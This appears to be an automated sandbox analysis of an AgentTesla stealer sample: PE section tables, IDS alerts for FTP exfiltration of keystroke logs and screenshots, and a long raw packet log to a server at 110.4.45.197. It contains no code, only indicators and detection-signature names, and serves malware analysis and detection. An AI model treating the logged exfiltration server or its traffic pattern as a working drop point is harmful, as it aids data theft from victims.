                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xcc0000xc.reloc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                  .text0x20000xc5dc00xc5e00b074eb37e4826303332e56f90279559bFalse0.866615011054959OpenPGP Secret Key7.636878369806903IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                  .rsrc0xc80000x2f4c0x3000c6bbb12e41f4c143f3b4e278594a8eacFalse0.9442545572916666data7.741007404585098IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .reloc0xcc0000xc0x200b6aa20be5f05ac6e9c51baa59e374b7fFalse0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                  RT_ICON0xc80c80x2bf4PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9942232492001422
                                                                                                                  RT_GROUP_ICON0xcaccc0x14data1.05
                                                                                                                  RT_VERSION0xcacf00x258data0.4816666666666667
                                                                                                                  DLLImport
                                                                                                                  mscoree.dll_CorExeMain
                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                  2025-01-10T19:16:35.902330+01002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.449743110.4.45.19721TCP
                                                                                                                  2025-01-10T19:16:36.746851+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.449748110.4.45.19749512TCP
                                                                                                                  2025-01-10T19:16:36.752254+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.449748110.4.45.19749512TCP
                                                                                                                  2025-01-10T19:16:41.503463+01002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.449753110.4.45.19721TCP
                                                                                                                  2025-01-10T19:16:42.333821+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.449755110.4.45.19756014TCP
                                                                                                                  2025-01-10T19:16:42.339180+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.449755110.4.45.19756014TCP
                                                                                                                  2025-01-10T19:16:49.648006+01002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.449759110.4.45.19721TCP
                                                                                                                  2025-01-10T19:16:50.477613+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.449760110.4.45.19758731TCP
                                                                                                                  2025-01-10T19:16:50.483043+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.449760110.4.45.19758731TCP
                                                                                                                  2025-01-10T19:17:52.872682+01001800008Joe Security MALWARE AgentTesla - FTP Exfil Screenshots1192.168.2.450000110.4.45.19765033TCP
                                                                                                                  2025-01-10T19:17:53.843622+01001800007Joe Security MALWARE AgentTesla - FTP Exfil Keyboard Logs1192.168.2.450008110.4.45.19762859TCP
                                                                                                                  2025-01-10T19:17:56.489053+01001800008Joe Security MALWARE AgentTesla - FTP Exfil Screenshots1192.168.2.450027110.4.45.19756202TCP
                                                                                                                  2025-01-10T19:18:08.875649+01001800008Joe Security MALWARE AgentTesla - FTP Exfil Screenshots1192.168.2.450038110.4.45.19764854TCP
                                                                                                                  2025-01-10T19:18:23.666309+01001800008Joe Security MALWARE AgentTesla - FTP Exfil Screenshots1192.168.2.450039110.4.45.19749158TCP
                                                                                                                  2025-01-10T19:18:33.306104+01001800008Joe Security MALWARE AgentTesla - FTP Exfil Screenshots1192.168.2.450041110.4.45.19764021TCP
                                                                                                                  2025-01-10T19:18:33.357346+01001800008Joe Security MALWARE AgentTesla - FTP Exfil Screenshots1192.168.2.450042110.4.45.19759944TCP
                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Jan 10, 2025 19:16:22.941977978 CET49735443192.168.2.4104.26.12.205
                                                                                                                  Jan 10, 2025 19:16:22.942030907 CET44349735104.26.12.205192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:22.942171097 CET49735443192.168.2.4104.26.12.205
                                                                                                                  Jan 10, 2025 19:16:22.954303980 CET49735443192.168.2.4104.26.12.205
                                                                                                                  Jan 10, 2025 19:16:22.954332113 CET44349735104.26.12.205192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:23.452681065 CET44349735104.26.12.205192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:23.452850103 CET49735443192.168.2.4104.26.12.205
                                                                                                                  Jan 10, 2025 19:16:23.456895113 CET49735443192.168.2.4104.26.12.205
                                                                                                                  Jan 10, 2025 19:16:23.456906080 CET44349735104.26.12.205192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:23.457214117 CET44349735104.26.12.205192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:23.508955002 CET49735443192.168.2.4104.26.12.205
                                                                                                                  Jan 10, 2025 19:16:23.700243950 CET49735443192.168.2.4104.26.12.205
                                                                                                                  Jan 10, 2025 19:16:23.743335962 CET44349735104.26.12.205192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:23.818598032 CET44349735104.26.12.205192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:23.818665981 CET44349735104.26.12.205192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:23.818804026 CET49735443192.168.2.4104.26.12.205
                                                                                                                  Jan 10, 2025 19:16:23.926038980 CET49735443192.168.2.4104.26.12.205
                                                                                                                  Jan 10, 2025 19:16:25.260126114 CET4973721192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:25.264934063 CET2149737110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:25.265003920 CET4973721192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:25.283945084 CET4973721192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:25.288867950 CET2149737110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:25.288914919 CET4973721192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:25.385855913 CET4973821192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:25.390815973 CET2149738110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:25.390894890 CET4973821192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:26.217956066 CET2149738110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:26.218301058 CET4973821192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:26.223157883 CET2149738110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:26.551255941 CET2149738110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:26.551418066 CET4973821192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:26.556260109 CET2149738110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:26.951740980 CET2149738110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:26.951891899 CET4973821192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:26.956728935 CET2149738110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:27.287350893 CET2149738110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:27.288420916 CET4973821192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:27.293276072 CET2149738110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:27.611993074 CET2149738110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:27.612147093 CET4973821192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:27.617099047 CET2149738110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:27.976144075 CET2149738110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:27.976352930 CET4973821192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:27.981175900 CET2149738110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:28.299974918 CET2149738110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:28.300745010 CET4974056301192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:28.305627108 CET5630149740110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:28.305699110 CET4974056301192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:28.305877924 CET4973821192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:28.310676098 CET2149738110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:29.157676935 CET2149738110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:29.159796953 CET4974056301192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:29.159877062 CET4974056301192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:29.164778948 CET5630149740110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:29.164823055 CET5630149740110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:29.164834023 CET5630149740110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:29.165097952 CET5630149740110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:29.166157007 CET4974056301192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:29.320733070 CET4973821192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:29.495646000 CET2149738110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:29.496218920 CET4973821192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:29.501102924 CET2149738110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:29.820641994 CET2149738110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:29.821628094 CET4974162132192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:29.826585054 CET6213249741110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:29.826668024 CET4974162132192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:29.826813936 CET4973821192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:29.831617117 CET2149738110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:30.672576904 CET2149738110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:30.672864914 CET4974162132192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:30.677926064 CET6213249741110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:30.678142071 CET4974162132192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:30.789295912 CET49742443192.168.2.4104.26.12.205
                                                                                                                  Jan 10, 2025 19:16:30.789354086 CET44349742104.26.12.205192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:30.789508104 CET49742443192.168.2.4104.26.12.205
                                                                                                                  Jan 10, 2025 19:16:30.795337915 CET49742443192.168.2.4104.26.12.205
                                                                                                                  Jan 10, 2025 19:16:30.795365095 CET44349742104.26.12.205192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:30.820717096 CET4973821192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:30.996934891 CET2149738110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:31.133218050 CET4973821192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:31.281997919 CET44349742104.26.12.205192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:31.282192945 CET49742443192.168.2.4104.26.12.205
                                                                                                                  Jan 10, 2025 19:16:31.283837080 CET49742443192.168.2.4104.26.12.205
                                                                                                                  Jan 10, 2025 19:16:31.283855915 CET44349742104.26.12.205192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:31.284107924 CET44349742104.26.12.205192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:31.340097904 CET49742443192.168.2.4104.26.12.205
                                                                                                                  Jan 10, 2025 19:16:31.383347988 CET44349742104.26.12.205192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:31.450742006 CET44349742104.26.12.205192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:31.450818062 CET44349742104.26.12.205192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:31.450911999 CET49742443192.168.2.4104.26.12.205
                                                                                                                  Jan 10, 2025 19:16:31.454639912 CET49742443192.168.2.4104.26.12.205
                                                                                                                  Jan 10, 2025 19:16:32.856091976 CET4974321192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:32.861110926 CET2149743110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:32.861480951 CET4974321192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:33.685415983 CET2149743110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:33.685688019 CET4974321192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:33.690581083 CET2149743110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:34.012408018 CET2149743110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:34.012701035 CET4974321192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:34.017573118 CET2149743110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:34.378088951 CET2149743110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:34.380270004 CET4974321192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:34.387290001 CET2149743110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:34.705820084 CET2149743110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:34.820951939 CET4974321192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:34.882468939 CET4974321192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:34.887602091 CET2149743110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:35.217176914 CET2149743110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:35.221441031 CET4974321192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:35.226253986 CET2149743110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:35.568030119 CET2149743110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:35.568238020 CET4974321192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:35.573122025 CET2149743110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:35.894321918 CET2149743110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:35.895983934 CET4974849512192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:35.902194977 CET4951249748110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:35.902299881 CET4974849512192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:35.902329922 CET4974321192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:35.908437967 CET2149743110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:36.746552944 CET2149743110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:36.746850967 CET4974849512192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:36.746850967 CET4974849512192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:36.751679897 CET4951249748110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:36.752046108 CET4951249748110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:36.752254009 CET4974849512192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:36.820740938 CET4974321192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:36.893580914 CET49750443192.168.2.4104.26.12.205
                                                                                                                  Jan 10, 2025 19:16:36.893613100 CET44349750104.26.12.205192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:36.893682003 CET49750443192.168.2.4104.26.12.205
                                                                                                                  Jan 10, 2025 19:16:36.897469997 CET49750443192.168.2.4104.26.12.205
                                                                                                                  Jan 10, 2025 19:16:36.897483110 CET44349750104.26.12.205192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:37.072251081 CET2149743110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:37.096971035 CET4974321192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:37.101768017 CET2149743110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:37.359800100 CET44349750104.26.12.205192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:37.359925985 CET49750443192.168.2.4104.26.12.205
                                                                                                                  Jan 10, 2025 19:16:37.365377903 CET49750443192.168.2.4104.26.12.205
                                                                                                                  Jan 10, 2025 19:16:37.365411997 CET44349750104.26.12.205192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:37.365781069 CET44349750104.26.12.205192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:37.424634933 CET2149743110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:37.430115938 CET49750443192.168.2.4104.26.12.205
                                                                                                                  Jan 10, 2025 19:16:37.634038925 CET4974321192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:37.854820967 CET49750443192.168.2.4104.26.12.205
                                                                                                                  Jan 10, 2025 19:16:37.861984015 CET4975249476192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:37.866924047 CET4947649752110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:37.867073059 CET4975249476192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:37.869219065 CET4974321192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:37.874052048 CET2149743110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:37.895349026 CET44349750104.26.12.205192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:37.960191011 CET44349750104.26.12.205192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:37.960268021 CET44349750104.26.12.205192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:37.960493088 CET49750443192.168.2.4104.26.12.205
                                                                                                                  Jan 10, 2025 19:16:37.964201927 CET49750443192.168.2.4104.26.12.205
                                                                                                                  Jan 10, 2025 19:16:38.489074945 CET4975321192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:38.494086981 CET2149753110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:38.494178057 CET4975321192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:38.694217920 CET2149743110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:38.694434881 CET4975249476192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:38.694483995 CET4975249476192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:38.699376106 CET4947649752110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:38.699388981 CET4947649752110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:38.699405909 CET4947649752110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:38.699642897 CET4947649752110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:38.699704885 CET4975249476192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:38.820724964 CET4974321192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:39.020669937 CET2149743110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:39.022691011 CET4974321192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:39.027564049 CET2149743110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:39.347632885 CET2149743110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:39.348675013 CET4975455440192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:39.349699974 CET2149753110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:39.349905014 CET4975321192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:39.353539944 CET5544049754110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:39.353792906 CET4974321192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:39.354094982 CET4975455440192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:39.354749918 CET2149753110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:39.358628988 CET2149743110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:39.742343903 CET2149753110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:39.742525101 CET4975321192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:39.747453928 CET2149753110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:40.120299101 CET2149753110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:40.148365974 CET4975321192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:40.153579950 CET2149753110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:40.194278002 CET2149743110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:40.243350029 CET4974321192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:40.259349108 CET4975455440192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:40.264487982 CET5544049754110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:40.264570951 CET4975455440192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:40.485646963 CET2149753110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:40.487755060 CET4975321192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:40.492645979 CET2149753110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:40.606847048 CET2149743110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:40.648821115 CET4974321192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:40.824549913 CET2149753110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:40.824840069 CET4975321192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:40.829724073 CET2149753110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:41.161221027 CET2149753110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:41.161412001 CET4975321192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:41.166377068 CET2149753110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:41.497663021 CET2149753110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:41.498320103 CET4975556014192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:41.503226995 CET5601449755110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:41.503334045 CET4975556014192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:41.503463030 CET4975321192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:41.508354902 CET2149753110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:42.333451033 CET2149753110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:42.333821058 CET4975556014192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:42.333821058 CET4975556014192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:42.338617086 CET5601449755110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:42.339024067 CET5601449755110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:42.339179993 CET4975556014192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:42.383475065 CET4975321192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:42.662556887 CET2149753110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:42.686995983 CET4975321192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:42.691791058 CET2149753110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:43.022823095 CET2149753110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:43.028786898 CET4975657660192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:43.033657074 CET5766049756110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:43.033750057 CET4975657660192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:43.037434101 CET4975321192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:43.042293072 CET2149753110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:43.861056089 CET2149753110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:43.863132954 CET4975657660192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:43.863183975 CET4975657660192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:43.868166924 CET5766049756110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:43.868184090 CET5766049756110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:43.868190050 CET5766049756110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:43.868513107 CET5766049756110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:43.868587017 CET4975657660192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:43.914489985 CET4975321192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:44.193226099 CET2149753110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:44.193682909 CET4975321192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:44.198518038 CET2149753110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:44.530107021 CET2149753110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:44.530594110 CET4975752528192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:44.535489082 CET5252849757110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:44.535840988 CET4975752528192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:44.535860062 CET4975321192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:44.540661097 CET2149753110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:44.969388008 CET49758443192.168.2.4104.26.12.205
                                                                                                                  Jan 10, 2025 19:16:44.969424009 CET44349758104.26.12.205192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:44.969559908 CET49758443192.168.2.4104.26.12.205
                                                                                                                  Jan 10, 2025 19:16:44.972794056 CET49758443192.168.2.4104.26.12.205
                                                                                                                  Jan 10, 2025 19:16:44.972814083 CET44349758104.26.12.205192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:45.396611929 CET2149753110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:45.396967888 CET4975752528192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:45.402172089 CET5252849757110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:45.402223110 CET4975752528192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:45.445743084 CET4975321192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:45.465542078 CET44349758104.26.12.205192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:45.465856075 CET49758443192.168.2.4104.26.12.205
                                                                                                                  Jan 10, 2025 19:16:45.471259117 CET49758443192.168.2.4104.26.12.205
                                                                                                                  Jan 10, 2025 19:16:45.471282005 CET44349758104.26.12.205192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:45.471668959 CET44349758104.26.12.205192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:45.523991108 CET49758443192.168.2.4104.26.12.205
                                                                                                                  Jan 10, 2025 19:16:45.737381935 CET2149753110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:45.789470911 CET4975321192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:16:46.054650068 CET49758443192.168.2.4104.26.12.205
                                                                                                                  Jan 10, 2025 19:16:46.095339060 CET44349758104.26.12.205192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:46.198750973 CET44349758104.26.12.205192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:46.198827982 CET44349758104.26.12.205192.168.2.4
